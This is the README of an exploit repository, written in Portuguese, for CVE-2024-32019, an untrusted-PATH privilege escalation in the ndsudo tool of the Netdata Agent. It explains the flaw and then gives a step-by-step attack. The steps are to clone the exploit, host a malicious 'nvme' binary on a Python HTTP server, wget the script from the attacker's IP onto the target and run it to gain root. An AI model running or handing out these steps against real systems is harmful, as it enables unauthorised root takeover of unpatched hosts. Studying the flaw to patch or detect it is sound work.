
Exploit de escalonamento de privilégios baseado em Bash para CVE-2024-32019 na ferramenta ndsudo do Netdata Agent, aproveitando a busca PATH não confiável para executar binários arbitrários com permissões de root.
A vulnerabilidade ndsudo permite que um atacante obtenha permissões de root ao explorar um caminho de pesquisa não confiável na ferramenta ndsudo, que faz parte do Netdata Agent. Isso pode permitir a execução de programas arbitrários com privilégios elevados se o atacante colocar um binário malicioso em um diretório gravável e modificar a variável de ambiente PATH de acordo.
A vulnerabilidade ndsudo, identificada como CVE-2024-32019, afeta versões da ferramenta ndsudo incluídas no Netdata Agent, especificamente versões v1.45.0 e anteriores. Essa vulnerabilidade permite que atacantes escalem privilégios em sistemas onde a ferramenta está instalada.
Como a Vulnerabilidade Funciona:
Mecanismo de Exploração:-
Caminho de Pesquisa Não Confiável: A ferramenta ndsudo usa a variável de ambiente PATH para localizar comandos externos. Um atacante pode manipular essa variável para apontar para um diretório que ele controla.
Execução de Binários Maliciosos: Ao colocar um executável malicioso com o mesmo nome de um comando que o ndsudo tem
permissão para executar (ex., nvme) em um diretório gravável, o atacante pode executar código arbitrário com permissões de root.
Complexidade do Ataque:-
Baixa Complexidade: O ataque não requer habilidades avançadas; um script bash facilmente criado pode ser usado para escalonamento de privilégios, tornando-o acessível a muitos potenciais atacantes.
Impacto da Vulnerabilidade:-
Escalonamento de Privilégios: A exploração bem-sucedida permite que um atacante obtenha acesso root, o que pode levar ao controle total sobre o sistema afetado.
Riscos Potenciais: Isso pode resultar em acesso não autorizado a dados, manipulação do sistema e exploração adicional de recursos de rede.
ESCALONAMENTO DE PRIVILÉGIOS Criei dois scripts bash para obter facilmente acesso de usuário a root. Siga os passos conforme mencionado abaixo:-
git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git
cd CVE-2024-32019-ndsudo
chmod +x ndsudo_exp.sh
Agora crie um servidor python:
python3 -m http.server 8080
Abra o arquivo ndsudo_exploit.sh usando gedit ou pluma, o que estiver disponível. Você verá o comando wget assim:
wget http://10.10.14.70:8080/nvme -o /tmp/nvme
Altere o endereço IP para o IP da sua própria máquina
Agora vá para a máquina alvo, abra o terminal e faça o seguinte:
wget http://<seu-ip>:8080/ndsudo_exploit.sh
chmod +x ndsudo_exploit.sh
./ndsudo_exploit.sh